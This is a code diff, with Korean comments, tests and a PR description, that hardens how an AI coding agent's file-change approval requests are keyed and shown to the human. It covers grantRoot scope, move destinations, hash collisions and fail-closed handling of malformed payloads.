+ * 그대로 재사용된다 — 사람은 파일 2개를 승인했는데 열리는 것은 폴더 전체다.
+ */
+describe("S2 — grantRoot 는 별개 승인이다", () => {
+  test("★구세대: grantRoot 가 붙으면 열쇠가 달라진다★ (붙기 전 열쇠로 통과되면 안 된다)", () => {
+    const plain: ApprovalRequest = { method: "applyPatchApproval", params: { fileChanges: { "a.ts": {}, "b.ts": {} }, callId: "c1" } };
+    const rooted: ApprovalRequest = { method: "applyPatchApproval", params: { fileChanges: { "a.ts": {}, "b.ts": {} }, callId: "c1", grantRoot: "/repo" } };
+    const opPlain = buildOperationFromApproval(plain, "dex");
+    const opRoot = buildOperationFromApproval(rooted, "dex");
+    expect(scopeKeyForOperation(opPlain)).not.toBe(scopeKeyForOperation(opRoot));
+    expect(approvalOperationHash(plain)).not.toBe(approvalOperationHash(rooted));
+    expect(opRoot.text).toContain("세션 동안");
+    expect(opRoot.text).toContain("/repo");
+  });
+
+  test("★신세대: grantRoot 가 붙으면 열쇠가 달라진다★", () => {
+    const item = observed([["src/a.ts", "update", 1]]);
+    const plain = buildOperationFromApproval(fileReq(item), "dex");
+    const rooted = buildOperationFromApproval(fileReq(item, { grantRoot: "/repo" }), "dex");
+    expect(scopeKeyForOperation(plain)).not.toBe(scopeKeyForOperation(rooted));
+    expect(rooted.provenance?.grant_root).toBe("/repo");
+  });
+
+  test("★target 이 240자로 잘려도 grant_root 가 살아남는다★ — 제일 위험한 정보가 잘리면 안 된다", () => {
+    // permissionGate.targetForOperation 은 앞 240자만 쓴다. 파일 목록이 길면 뒤가 통째로 잘린다 —
+    // grantRoot 를 뒤에 붙였다면 ★잘려나가서 평범한 파일 승인과 같은 열쇠★ 가 된다. 그래서 맨 앞에 둔다.
+    const many = Array.from({ length: 40 }, (_, i) => [`src/very/long/path/file${i}.ts`, "update", 1] as [string, string, number]);
+    const rooted = buildOperationFromApproval(fileReq(observed(many), { grantRoot: "/repo" }), "dex");
+    const plain = buildOperationFromApproval(fileReq(observed(many)), "dex");
+    expect(targetForOperation(rooted).length).toBe(240); // 실제로 잘렸다
+    expect(targetForOperation(rooted)).toContain("grant_root=/repo");
+    expect(scopeKeyForOperation(rooted)).not.toBe(scopeKeyForOperation(plain));
+  });
+
+  test("빈 grantRoot·공백은 없는 것으로 본다 — 경고를 남발하지 않는다", () => {
+    const item = observed([["src/a.ts", "update", 1]]);
+    for (const blank of ["", "   ", null, undefined, 123]) {
+      const op = buildOperationFromApproval(fileReq(item, { grantRoot: blank }), "dex");
+      expect(op.path).toBe("src/a.ts");
+      expect(op.provenance?.grant_root).toBeNull();
+    }
+  });
+});
+
+/**
+ * ★회귀 가드 — 구세대 경로는 값까지 그대로여야 한다.★
+ * 진행 중인 승인의 상관키가 어긋나면 결정이 배달되지 않는다(fail-closed 로 거절된다).
+ */
+describe("S2 — 구세대 불변", () => {
+  test("★grantRoot 없는 구세대 지문 값이 S2 이전과 동일하다★ — 정본 4430021 실측 golden", () => {
+    const apply: ApprovalRequest = { method: "applyPatchApproval", params: { fileChanges: { "b.ts": {}, "a.ts": {} }, callId: "c1" } };
+    expect(approvalOperationHash(apply)).toBe("c7fa63459c642993");
+    const op = buildOperationFromApproval(apply, "dex");
+    expect(op.path).toBe("a.ts|b.ts"); // 표시·열쇠 모두 그대로
+    expect(op.text).toBe("a.ts, b.ts");
+  });
+
+  test("★구세대 명령 지문 값도 그대로다★ — S1 golden 재확인(basis 에 키를 무조건 추가하지 않았다)", () => {
+    const exec: ApprovalRequest = { method: "execCommandApproval", params: { command: ["ls", "-la"], cwd: "/tmp" } };
+    expect(approvalOperationHash(exec)).toBe("b1a8a5879bc13205");
+  });
+
+  test("★한 턴에 온 서로 다른 파일변경 승인은 서로 다른 지문을 갖는다★ — 상관키가 둘을 구분해야 한다", () => {
+    // 신세대 파일변경 params 는 command·fileChanges·reason 이 전부 없다. itemId 를 안 넣으면
+    // ★두 요청의 지문이 같아진다★(S1 에서 문자열 command 로 겪은 것과 같은 형태).
+    const a: ApprovalRequest = { method: "item/fileChange/requestApproval", params: { itemId: "i1", turnId: "t1", threadId: "th1", startedAtMs: 1 } };
+    const b: ApprovalRequest = { method: "item/fileChange/requestApproval", params: { itemId: "i2", turnId: "t1", threadId: "th1", startedAtMs: 1 } };
+    expect(approvalOperationHash(a)).not.toBe(approvalOperationHash(b));
+  });
+});

--- a/src/server/runtimes/codex/appServerPopup.s2.test.ts
+++ b/src/server/runtimes/codex/appServerPopup.s2.test.ts
@@ -54,6 +54,19 @@ describe("S2 — 신세대 파일변경 승인 해석", () => {
     expect(targetForOperation(op)).toMatch(/#[0-9a-f]{16}/);
   });
 
+  test("★혼합 payload — 파일변경 method + 짝 없음 + fileChanges 는 write 가 아니라 unparsed★", () => {
+    // ★뮤턴트가 살아남아 드러난 구멍(2026-07-29).★ 짝이 없을 때 '그냥 다음 분기로 흘려보내도' 신세대
+    // 정상 payload 에는 fileChanges 가 없어서 결과가 같다 — 그래서 아무 시험도 안 깨졌다.
+    // 그런데 malformed 입력이 fileChanges 를 달고 오면 ★그대로 write 로 처리된다.★
+    // S1 에서 Codex 가 명령 승인에 대해 잡았던 것과 ★같은 계열★ 이다: 파일변경 승인이라고 밝힌 요청은
+    // 내용을 못 찾는 순간 거기서 멈춰야 한다. ★못 찾음을 다른 경로의 입력으로 재활용하지 않는다.★
+    const mixed: ApprovalRequest = {
+      method: "item/fileChange/requestApproval",
+      params: { itemId: "i1", turnId: "t1", threadId: "th1", startedAtMs: 1, fileChanges: { "x.ts": {} } },
+    };
+    expect(buildOperationFromApproval(mixed, "dex").action).toBe("approval_unparsed");
+  });
+
   test("★관측은 됐는데 변경이 비어 있으면 '내용 없는 쓰기 승인' 을 만들지 않는다★", () => {
     const empty: ObservedItem = { itemId: "i1", turnId: "t1", threadId: "th1", changes: [] };
     expect(buildOperationFromApproval(fileReq(empty), "dex").action).toBe("approval_unparsed");

--- a/src/server/runtimes/codex/appServerPopup.s2.test.ts
+++ b/src/server/runtimes/codex/appServerPopup.s2.test.ts
@@ -210,7 +210,8 @@ describe("S2 — grantRoot 는 별개 승인이다", () => {
     const rooted = buildOperationFromApproval(fileReq(observed(many), { grantRoot: "/repo" }), "dex");
     const plain = buildOperationFromApproval(fileReq(observed(many)), "dex");
     expect(targetForOperation(rooted).length).toBe(240); // 실제로 잘렸다
-    expect(targetForOperation(rooted)).toContain("grant_root=/repo");
+    // 열쇠에는 ★전체 루트의 지문★ 이 맨 앞에 온다(P2 수정) — 원문만 앞에 두면 긴 루트끼리 충돌한다.
+    expect(targetForOperation(rooted)).toMatch(/^grant_root#[0-9a-f]{16}=\/repo/);
     expect(scopeKeyForOperation(rooted)).not.toBe(scopeKeyForOperation(plain));
   });
 
@@ -221,6 +222,91 @@ describe("S2 — grantRoot 는 별개 승인이다", () => {
       expect(op.path).toBe("src/a.ts");
       expect(op.provenance?.grant_root).toBeNull();
     }
+  });
+});
+
+/**
+ * ★Codex 리뷰(2026-07-29) 차단 2건 — 둘 다 내가 재현해서 확인했다.★
+ *
+ * 공통 원인이 하나다: ★팝업이 보여주는 것과 열쇠가 뜻하는 것이 어긋났다.★
+ * 어긋나면 보여준 쪽은 아무 힘이 없다 — '항상 허용' 이 한 번 붙는 순간 ★두 번째 팝업은 안 뜨기 때문에★
+ * 사람은 차이를 볼 기회조차 없다.
+ */
+describe("S2 — 이동 목적지(P1)", () => {
+  const moveReq = (movePath: string): ApprovalRequest => ({
+    method: "item/fileChange/requestApproval",
+    params: { itemId: "i1", turnId: "t1", threadId: "th1", startedAtMs: 1 },
+    observedItem: {
+      itemId: "i1", turnId: "t1", threadId: "th1",
+      changes: [{ path: "a.ts", kind: "update", movePath, diff: "@@ -1 +1 @@\n-x\n+y\n" }],
+    },
+  });
+
+  test("★목적지가 다르면 열쇠가 다르다★ — 안전한 이동에 준 허용이 임의 목적지에 재사용되면 안 된다", () => {
+    const safe = buildOperationFromApproval(moveReq("safe.ts"), "dex");
+    const evil = buildOperationFromApproval(moveReq("outside/target.ts"), "dex");
+    // 재현(수정 전): 팝업 문구는 달랐는데 scopeKey 가 완전히 같았다.
+    expect(safe.text).not.toBe(evil.text);
+    expect(scopeKeyForOperation(safe)).not.toBe(scopeKeyForOperation(evil));
+    expect(safe.path).toBe("a.ts>safe.ts");
+  });
+
+  test("★구세대에도 같은 구멍이 있었다★ — UpdateFileChange.move_path", () => {
+    const mk = (movePath: string): ApprovalRequest => ({
+      method: "applyPatchApproval",
+      params: { fileChanges: { "a.ts": { type: "update", unified_diff: "d", move_path: movePath } }, callId: "c1" },
+    });
+    const safe = mk("safe.ts"), evil = mk("outside/target.ts");
+    expect(scopeKeyForOperation(buildOperationFromApproval(safe, "dex")))
+      .not.toBe(scopeKeyForOperation(buildOperationFromApproval(evil, "dex")));
+    expect(approvalOperationHash(safe)).not.toBe(approvalOperationHash(evil)); // 지문도 갈려야 한다
+  });
+
+  test("이동이 아니면 표기가 예전과 똑같다 — 구세대 값 불변 조건", () => {
+    const op = buildOperationFromApproval({
+      method: "applyPatchApproval",
+      params: { fileChanges: { "b.ts": { type: "add", content: "x" }, "a.ts": {} }, callId: "c1" },
+    }, "dex");
+    expect(op.path).toBe("a.ts|b.ts");
+  });
+});
+
+describe("S2 — 긴 grantRoot(P2)", () => {
+  const longRoot = (suffix: string) => "/" + "x".repeat(309) + suffix;
+  const mkNew = (root: string): ApprovalRequest => ({
+    method: "item/fileChange/requestApproval",
+    params: { itemId: "i1", turnId: "t1", threadId: "th1", startedAtMs: 1, grantRoot: root },
+    observedItem: {
+      itemId: "i1", turnId: "t1", threadId: "th1",
+      changes: [{ path: "a.ts", kind: "update", movePath: null, diff: "@@ -1 +1 @@\n-x\n+y\n" }],
+    },
+  });
+
+  test("★공통 prefix 가 길어도 서로 다른 루트는 서로 다른 열쇠·지문★", () => {
+    // 재현(수정 전): grantRoot 를 300자로 ★먼저 잘라서★ 두 루트가 같은 값이 됐고, 열쇠도 지문도 같았다.
+    // 이제 열쇠에는 ★전체의 지문★ 을 맨 앞에 넣는다 — 240자 절단이 지문을 못 자른다.
+    const one = mkNew(longRoot("/one")), two = mkNew(longRoot("/two"));
+    expect(scopeKeyForOperation(buildOperationFromApproval(one, "dex")))
+      .not.toBe(scopeKeyForOperation(buildOperationFromApproval(two, "dex")));
+    expect(approvalOperationHash(one)).not.toBe(approvalOperationHash(two));
+    expect(targetForOperation(buildOperationFromApproval(one, "dex"))).toMatch(/^grant_root#[0-9a-f]{16}=/);
+  });
+
+  test("구세대도 같다", () => {
+    const mk = (root: string): ApprovalRequest => ({
+      method: "applyPatchApproval",
+      params: { fileChanges: { "a.ts": {} }, callId: "c1", grantRoot: root },
+    });
+    const one = mk(longRoot("/one")), two = mk(longRoot("/two"));
+    expect(scopeKeyForOperation(buildOperationFromApproval(one, "dex")))
+      .not.toBe(scopeKeyForOperation(buildOperationFromApproval(two, "dex")));
+    expect(approvalOperationHash(one)).not.toBe(approvalOperationHash(two));
+  });
+
+  test("긴 루트여도 사람이 볼 경고는 남는다", () => {
+    const op = buildOperationFromApproval(mkNew(longRoot("/one")), "dex");
+    expect(op.text).toContain("세션 동안");
+    expect(op.provenance?.grant_root).toBe(longRoot("/one")); // audit 에는 전체가 남는다
   });
 });
 

--- a/src/server/runtimes/codex/appServerPopup.ts
+++ b/src/server/runtimes/codex/appServerPopup.ts
@@ -67,7 +67,9 @@ export function approvalOperationHash(req: ApprovalRequest): string {
     //   S1 이 그 문자열을 실제 shell operation 으로 승격하므로, 상관키·audit 지문도 구분해야 한다.
     //   ★배열은 배열 그대로 둔다★ — 구세대 지문 값을 바꾸지 않기 위해서다(변경 범위 최소).
     command: Array.isArray(p.command) ? p.command : (typeof p.command === "string" ? p.command.trim() || null : null),
-    files: p.fileChanges && typeof p.fileChanges === "object" ? Object.keys(p.fileChanges).sort() : null,
+    // ★이동 목적지도 담는다(Codex 리뷰 P1)★ — 예전엔 출발지만 담아 목적지만 다른 두 요청이 같은 지문이었다.
+    //   move_path 가 없으면 결과가 Object.keys().sort() 와 완전히 같다(golden 고정).
+    files: p.fileChanges && typeof p.fileChanges === "object" ? fileChangeEntries(p.fileChanges) : null,
     reason: typeof p.reason === "string" ? p.reason : null,
   };
   // ★S2 — 신세대 파일변경 승인은 위 4개가 ★전부 비어 있다★(method 말고는 command·files·reason 모두 null).
@@ -186,7 +188,8 @@ export function buildOperationFromApproval(req: ApprovalRequest, agentId: string
     // scope_key(target)의 입력을 files[0]에서 '정렬된 전체 파일목록'으로 넓힌다.
     // ★단 target 절단 전까지만 구분력이 늘어날 뿐, '서로 다른 파일집합 → 서로 다른 scope'를 일반 보장하지 않는다.★
     // (여기서 500자, permissionGate.targetForOperation에서 240자로 잘린다.) 전체 결합은 미구현 — 이슈 #106.
-    const files = Object.keys(p.fileChanges).sort();
+    // ★구세대에도 이동 목적지가 있다★ — UpdateFileChange.move_path. 신세대와 같은 구멍이었다(P1).
+    const files = fileChangeEntries(p.fileChanges);
     // ★S2: grantRoot 는 구세대 applyPatchApproval 에도 있다★ — 지금까지 통째로 무시하고 있었다.
     //   있으면 '이 파일들' 이 아니라 ★'이 루트 하위 전부' 를 세션 동안 허용해 달라는 요청★ 이다.
     //   열쇠에 반영하지 않으면 파일 몇 개에 준 '항상 허용' 이 루트 전체 승인으로 재사용된다.
@@ -194,8 +197,8 @@ export function buildOperationFromApproval(req: ApprovalRequest, agentId: string
     if (grantRoot) {
       return {
         runtime: "codex", agent_id: agentId, action: "write",
-        path: `grant_root=${grantRoot} | ${files.join("|")}`.slice(0, 500),
-        text: `${GRANT_ROOT_WARNING}${grantRoot} · 파일 ${files.length}개: ${files.join(", ")}`.slice(0, 500),
+        path: `${grantRootKey(grantRoot)} | ${files.join("|")}`.slice(0, 500),
+        text: `${GRANT_ROOT_WARNING}${grantRoot.slice(0, 200)} · 파일 ${files.length}개: ${files.join(", ")}`.slice(0, 500),
         requested_by: agentId, provenance: { ...provenance, grant_root: grantRoot },
       };
     }
@@ -216,7 +219,43 @@ function grantRootOf(p: Record<string, any> | undefined): string | null {
   const raw = p?.grantRoot;
   if (typeof raw !== "string") return null;
   const t = raw.trim();
-  return t.length > 0 ? t.slice(0, 300) : null;
+  // ★여기서 자르지 않는다(Codex 리뷰 2026-07-29 P2).★ 앞선 판은 300자로 잘랐는데, 그러면
+  //   ★공통 prefix 가 긴 서로 다른 루트가 같은 값이 되어 열쇠·지문이 합쳐졌다★
+  //   (310자 공통 + `/one` vs `/two` 로 재현 확인). 자르는 것은 ★표시할 때만★ 한다.
+  return t.length > 0 ? t : null;
+}
+
+/** 열쇠에 넣을 grantRoot 표현. ★지문을 맨 앞에 둔다★ — permissionGate 가 target 을 앞 240자만 쓰므로,
+ *  원문만 넣으면 ★잘려서 서로 다른 루트가 같은 열쇠★ 가 된다. 사람이 읽을 원문도 뒤에 조금 남긴다. */
+function grantRootKey(root: string): string {
+  const digest = createHash("sha256").update(root).digest("hex").slice(0, 16);
+  return `grant_root#${digest}=${root.slice(0, 120)}`;
+}
+
+/**
+ * ★쓰기 대상 한 건의 표기 — 이동이면 목적지까지 포함한다(Codex 리뷰 2026-07-29 P1).★
+ *
+ * 앞선 판은 출발지만 열쇠에 넣고 목적지는 ★팝업 글자에만★ 넣었다. 그래서 `a.ts→safe.ts` 와
+ * `a.ts→outside/target.ts` 가 ★팝업 문구는 다른데 열쇠가 완전히 같았다.★
+ * ★그게 특히 나쁜 이유★: 안전한 이동에 '항상 허용' 을 한 번 주면 위험한 목적지로의 이동은
+ * ★팝업 자체가 안 뜬다★ — 사람이 그 차이를 볼 기회가 없다. ★팝업이 보여주는 것과 열쇠가 뜻하는 것이
+ * 어긋나면, 보여준 쪽은 아무 힘이 없다.★
+ */
+function writeTargetEntry(path: string, movePath: string | null): string {
+  return movePath ? `${path}>${movePath}` : path;
+}
+
+/** 구세대 fileChanges(경로 → FileChange) → 정렬된 쓰기 대상 표기 목록.
+ *  ★move_path 는 UpdateFileChange 에만 있다★(0.144.6 스키마 실측) — 구세대에도 P1 과 ★같은 구멍★ 이
+ *  있었다(지금까지 Object.keys 만 봤다). move_path 가 없으면 결과가 예전 Object.keys().sort() 와
+ *  ★완전히 동일★ 하다 — 구세대 열쇠·지문 값 불변 조건이고 golden 으로 고정해 뒀다. */
+function fileChangeEntries(fileChanges: Record<string, unknown>): string[] {
+  return Object.entries(fileChanges)
+    .map(([path, ch]) => {
+      const mv = ch && typeof ch === "object" && typeof (ch as any).move_path === "string" ? (ch as any).move_path : null;
+      return writeTargetEntry(path, mv && mv.trim() ? mv : null);
+    })
+    .sort();
 }
 
 /** 변경 규모(추가/삭제 줄수) — 사람이 ★'한 줄인지 삼백 줄인지'★ 를 가늠하게 하는 용도.
@@ -265,7 +304,8 @@ function fileChangeOperation(
   grantRoot: string | null,
   itemId: string,
 ): PermissionOperation {
-  const paths = [...new Set(changes.map((c) => c.path))].sort();
+  // ★이동은 목적지까지가 쓰기 대상이다★ — 출발지만 넣으면 목적지가 달라도 같은 열쇠가 된다(P1).
+  const entries = [...new Set(changes.map((c) => writeTargetEntry(c.path, c.movePath)))].sort();
   const summary = changes
     .slice()
     .sort((a, b) => a.path.localeCompare(b.path))
@@ -275,14 +315,14 @@ function fileChangeOperation(
       return `${c.kind} ${c.path}${dest}(+${added}/-${removed})`;
     })
     .join(", ");
-  const head = grantRoot ? `grant_root=${grantRoot} | ` : "";
-  const textHead = grantRoot ? `${GRANT_ROOT_WARNING}${grantRoot} · ` : "";
+  const head = grantRoot ? `${grantRootKey(grantRoot)} | ` : "";
+  const textHead = grantRoot ? `${GRANT_ROOT_WARNING}${grantRoot.slice(0, 200)} · ` : "";
   return {
     runtime: "codex",
     agent_id: agentId,
     action: "write",
-    path: `${head}${paths.join("|")}`.slice(0, 500),
-    text: `${textHead}파일 ${paths.length}개: ${summary}`.slice(0, 500),
+    path: `${head}${entries.join("|")}`.slice(0, 500),
+    text: `${textHead}파일 ${entries.length}개: ${summary}`.slice(0, 500),
     requested_by: agentId,
     provenance: {
       ...provenance,

--- a/src/server/runtimes/codex/appServerPopup.ts
+++ b/src/server/runtimes/codex/appServerPopup.ts
@@ -11,6 +11,7 @@ import { createHash, randomUUID } from "node:crypto";
 import type { Database } from "bun:sqlite";
 import { requestPermission, getPermissionRequest, type PermissionOperation } from "../../lib/permissionGate";
 import type { ApprovalRequest, ReviewDecision } from "./appServerClient";
+import type { ObservedFileChange } from "./appServerItemIndex";
 import { CodexApprovalCorrelationStore } from "./state";
 
 /** ★Phase1 ③: 이 서버 프로세스 인스턴스 id — 재시작 감지용(옛 팝업을 새 프로세스가 새 turn에 재결합 금지).★ */
@@ -59,7 +60,7 @@ export function finalizeApprovalDelivery(
  *     파일 내용 해시). ★그 전까지 B3OS_CODEX_APPSERVER를 켜지 않는다 — release blocker.★ */
 export function approvalOperationHash(req: ApprovalRequest): string {
   const p = req.params as Record<string, any>;
-  const basis = {
+  const basis: Record<string, unknown> = {
     method: req.method,
     // ★신세대 문자열 command 도 담는다★ — 예전엔 Array.isArray 만 봐서 신세대는 null 이 됐고,
     //   그 결과 ★서로 다른 신세대 명령이 같은 지문★ 을 가졌다(Codex 리뷰 2026-07-29에서 재현).
@@ -69,6 +70,15 @@ export function approvalOperationHash(req: ApprovalRequest): string {
     files: p.fileChanges && typeof p.fileChanges === "object" ? Object.keys(p.fileChanges).sort() : null,
     reason: typeof p.reason === "string" ? p.reason : null,
   };
+  // ★S2 — 신세대 파일변경 승인은 위 4개가 ★전부 비어 있다★(method 말고는 command·files·reason 모두 null).
+  //   그래서 한 턴에 두 건이 오면 ★서로 다른 요청이 같은 지문★ 을 갖는다 — S1 에서 문자열 command 로 겪은
+  //   것과 같은 형태다. 상관키·audit 이 둘을 구분해야 하므로 payload 에 있을 때만 덧붙인다.
+  //   ★있을 때만 넣는 이유★: 무조건 키를 추가하면 null 로라도 직렬화에 끼어들어 ★구세대 지문 값이 바뀐다★
+  //   (진행 중 승인의 상관키가 어긋난다). 구세대 params 에는 itemId·grantRoot 가 없다(스키마 실측).
+  const itemId = typeof p.itemId === "string" && p.itemId ? p.itemId : null;
+  if (itemId) basis.item_id = itemId;
+  const grantRoot = grantRootOf(p);
+  if (grantRoot) basis.grant_root = grantRoot;
   return createHash("sha256").update(JSON.stringify(basis)).digest("hex").slice(0, 16);
 }
 
@@ -156,14 +166,137 @@ export function buildOperationFromApproval(req: ApprovalRequest, agentId: string
   // ★명령 승인이라고 밝혔는데 명령을 못 읽었다 → 여기서 멈춘다.★ 아래 fileChanges 분기로 흘려보내면
   //   혼합 payload 가 write 로 처리되어 fail-closed 계약이 깨진다(Codex 리뷰 2026-07-29).
   if (parsed.kind === "invalid") return unparsedOperation(req, agentId, provenance);
+  // ★S2(#106) — 신세대 파일변경 승인을 실제 내용으로 해석한다.★
+  //
+  //  신세대 `item/fileChange/requestApproval` 은 ★무엇을 바꾸는지 payload 에 담지 않는다★(itemId 만 준다).
+  //  그리고 ★벤더 프로토콜에 item 을 id 로 조회하는 요청이 없다★ — 처음 계획서에 "itemId 로 조회한다" 고
+  //  적었던 것이 ★없는 기능★ 이었다(2026-07-29 스키마 전수 확인에서 발견).
+  //  대신 내용이 ★알림으로 먼저 온다★(item/started · item/fileChange/patchUpdated). 그래서 클라이언트가
+  //  같은 turn 안에서 itemId 로 색인해 두었다가 여기에 실어 준다(ApprovalRequest.observedItem).
+  //
+  //  ★짝이 없으면 내용을 지어내지 않는다★ — 알림을 못 봤거나 순서가 뒤집혔으면 해석 실패로 보내
+  //  매번 묻게 한다. 여기서 "파일 변경입니다" 라고만 뭉뚱그리면 ★그 method 로 오는 모든 변경이 한 열쇠★ 가
+  //  되어 S0 이 닫은 구멍이 다시 열린다.
+  if (req.method === "item/fileChange/requestApproval") {
+    const observed = req.observedItem;
+    if (!observed || observed.changes.length === 0) return unparsedOperation(req, agentId, provenance);
+    return fileChangeOperation(agentId, provenance, observed.changes, grantRootOf(p), observed.itemId);
+  }
   if (p.fileChanges && typeof p.fileChanges === "object") {
     // scope_key(target)의 입력을 files[0]에서 '정렬된 전체 파일목록'으로 넓힌다.
     // ★단 target 절단 전까지만 구분력이 늘어날 뿐, '서로 다른 파일집합 → 서로 다른 scope'를 일반 보장하지 않는다.★
     // (여기서 500자, permissionGate.targetForOperation에서 240자로 잘린다.) 전체 결합은 미구현 — 이슈 #106.
     const files = Object.keys(p.fileChanges).sort();
+    // ★S2: grantRoot 는 구세대 applyPatchApproval 에도 있다★ — 지금까지 통째로 무시하고 있었다.
+    //   있으면 '이 파일들' 이 아니라 ★'이 루트 하위 전부' 를 세션 동안 허용해 달라는 요청★ 이다.
+    //   열쇠에 반영하지 않으면 파일 몇 개에 준 '항상 허용' 이 루트 전체 승인으로 재사용된다.
+    const grantRoot = grantRootOf(p);
+    if (grantRoot) {
+      return {
+        runtime: "codex", agent_id: agentId, action: "write",
+        path: `grant_root=${grantRoot} | ${files.join("|")}`.slice(0, 500),
+        text: `${GRANT_ROOT_WARNING}${grantRoot} · 파일 ${files.length}개: ${files.join(", ")}`.slice(0, 500),
+        requested_by: agentId, provenance: { ...provenance, grant_root: grantRoot },
+      };
+    }
     return { runtime: "codex", agent_id: agentId, action: "write", path: files.join("|").slice(0, 500), text: files.join(", ").slice(0, 500), requested_by: agentId, provenance };
   }
   return unparsedOperation(req, agentId, provenance);
+}
+
+/** ★팝업에서 '이건 파일 몇 개가 아니다' 를 사람이 놓치지 않게 하는 머리말.★ 문구가 두 곳에서 같아야
+ *  하므로 상수로 둔다(구세대·신세대 경로 모두 같은 위험을 같은 말로 알린다). */
+const GRANT_ROOT_WARNING = "⚠ 세션 동안 아래 폴더 하위 전체에 쓰기 허용 요청 · ";
+
+/** grantRoot 를 꺼낸다. 빈 문자열·공백뿐이면 없는 것으로 본다.
+ *  ★벤더 설명: "the agent is asking the user to allow writes under this root for the remainder of the
+ *  session"★ — 즉 파일 단위 승인이 아니라 ★루트 단위 세션 승인★ 이다. UNSTABLE 표기지만 payload 에
+ *  실려 오는 이상 ★우리 쪽 열쇠와 표시는 이걸 반영해야 한다.★ */
+function grantRootOf(p: Record<string, any> | undefined): string | null {
+  const raw = p?.grantRoot;
+  if (typeof raw !== "string") return null;
+  const t = raw.trim();
+  return t.length > 0 ? t.slice(0, 300) : null;
+}
+
+/** 변경 규모(추가/삭제 줄수) — 사람이 ★'한 줄인지 삼백 줄인지'★ 를 가늠하게 하는 용도.
+ *
+ *  ★실측(2026-07-29, codex-cli 0.144.6 라이브)에서 diff 모양이 ★종류마다 다르다★ 는 것을 확인했다:★
+ *    update → 진짜 통일diff        `@@ -1,4 +1,3 @@\n alpha\n-bravo\n+BRAVO\n charlie\n-delta\n`
+ *    add    → ★파일 원문 그대로★   `HELLO\n`   (`+` 접두어도 `@@` 헤더도 없다)
+ *  처음엔 둘 다 통일diff 라고 가정하고 `+`/`-` 만 셌는데, 그러면 ★새 파일 생성이 전부 "(+0/-0)"★ 로 보인다 —
+ *  ★사람에게 "아무것도 안 바뀐다" 로 읽히는 것이 제일 나쁜 거짓말이다.★ 그래서 모양을 판별해서 센다.
+ *  (delete 는 라이브로 못 봤다 — 통일diff 가 아니면 삭제 규모로 센다.) */
+function changeStat(kind: string, diff: string): { added: number; removed: number } {
+  const lines = diff.split("\n");
+  const isUnified = lines.some((l) => l.startsWith("@@"));
+  if (isUnified) {
+    let added = 0, removed = 0;
+    for (const line of lines) {
+      if (line.startsWith("+++") || line.startsWith("---")) continue;
+      if (line.startsWith("+")) added++;
+      else if (line.startsWith("-")) removed++;
+    }
+    return { added, removed };
+  }
+  // 통일diff 가 아니면 ★원문★ 이다. 끝 개행 때문에 생기는 빈 줄은 빼고 센다.
+  const n = lines.filter((l, i) => l.length > 0 || i < lines.length - 1).length;
+  return kind === "delete" ? { added: 0, removed: n } : { added: n, removed: 0 };
+}
+
+/**
+ * ★S2 — 관측된 파일변경으로 write operation 을 만든다.★
+ *
+ * ■ 열쇠(scope)는 ★파일 경로 집합★ 이다 — 내용(diff)이 아니다.
+ *   내용까지 열쇠에 넣으면 같은 파일을 두 번 고칠 때마다 다른 열쇠가 되어 ★'항상 허용' 이 영원히 안 붙는다★
+ *   (S0 의 지문 열쇠가 정확히 그랬다 — 안전하지만 쓸 수 없었다). 사람이 '항상 허용' 으로 뜻하는 단위는
+ *   ★"이 파일들에 쓰는 것"★ 이고, 그건 구세대 동작과도 같다. ★단, grantRoot 가 있으면 단위가 통째로
+ *   달라지므로 열쇠 맨 앞에 넣는다★ — permissionGate 가 target 을 ★앞 240자만★ 쓰기 때문에
+ *   ★제일 위험한 정보가 잘려나가면 안 된다.★
+ *
+ * ■ 내용(diff)은 ★사람이 보는 요약★ 과 ★audit 지문★ 에만 쓴다.
+ *   diff 원문을 text 에 그대로 실으면 permissionGate.operationText 를 통해 ★파일 내용이 Tier-D 스캔에
+ *   걸려★ 멀쩡한 코드가 차단될 수 있다. 그래서 ★경로·종류·줄수 요약만★ 싣는다.
+ */
+function fileChangeOperation(
+  agentId: string,
+  provenance: Record<string, unknown>,
+  changes: ObservedFileChange[],
+  grantRoot: string | null,
+  itemId: string,
+): PermissionOperation {
+  const paths = [...new Set(changes.map((c) => c.path))].sort();
+  const summary = changes
+    .slice()
+    .sort((a, b) => a.path.localeCompare(b.path))
+    .map((c) => {
+      const { added, removed } = changeStat(c.kind, c.diff);
+      const dest = c.movePath ? `→${c.movePath}` : "";
+      return `${c.kind} ${c.path}${dest}(+${added}/-${removed})`;
+    })
+    .join(", ");
+  const head = grantRoot ? `grant_root=${grantRoot} | ` : "";
+  const textHead = grantRoot ? `${GRANT_ROOT_WARNING}${grantRoot} · ` : "";
+  return {
+    runtime: "codex",
+    agent_id: agentId,
+    action: "write",
+    path: `${head}${paths.join("|")}`.slice(0, 500),
+    text: `${textHead}파일 ${paths.length}개: ${summary}`.slice(0, 500),
+    requested_by: agentId,
+    provenance: {
+      ...provenance,
+      item_id: itemId,
+      grant_root: grantRoot,
+      // 관측 경로를 남긴다 — 나중에 "이 내용을 어디서 알았나" 를 답할 수 있어야 한다.
+      file_changes_source: "notification_index",
+      // ★audit 전용 내용 지문.★ 열쇠에는 안 들어간다(위 설명) — permissionGate 는 provenance 를 읽지 않는다.
+      file_changes_digest: createHash("sha256")
+        .update(JSON.stringify(changes.map((c) => [c.path, c.kind, c.movePath, c.diff]).sort()))
+        .digest("hex")
+        .slice(0, 16),
+    },
+  };
 }
 
 /** ★해석하지 못한 승인 요청의 operation.★ 두 곳에서 쓴다 — 아무 분기에도 안 걸린 경우와,


### PR DESCRIPTION
## 무엇을 고치나

신세대 `item/fileChange/requestApproval` 은 ★무엇을 바꾸는지 payload 에 담지 않는다★ — `itemId` 만 준다.
그래서 지금은 통째로 해석 실패로 떨어져, 승인 화면에서 ★사람이 무슨 파일을 바꾸는지 볼 수 없다.★

## ★착수 전 확인이 계획서를 두 번 고쳤다★

이 PR 에서 제일 중요한 부분이다. 두 번 다 ★코드를 다 쓴 뒤에야 알았을★ 성질의 것이다.

**① 계획서: "itemId 로 실제 변경을 조회한다" → ★그런 요청이 없다★**
벤더 스키마 39종 전수 확인 결과 `ClientRequest` 에 item 을 id 로 가져오는 요청이 ★아예 없다.★
내용은 ★알림으로 먼저 온다.★ 그래서 설계를 ★'조회' 가 아니라 '기억'★ 으로 바꿨다 — 먼저 온 알림을
`itemId` 로 색인해 두었다가 승인 시점에 짝짓는다.

**② 계획서: 내용 출처 = `item/fileChange/patchUpdated` → ★라이브에서 한 번도 안 온다★**
실제 `codex app-server` 를 띄워 파일 생성·수정을 두 번 시켰는데 그 알림은 ★0회★ 였다.
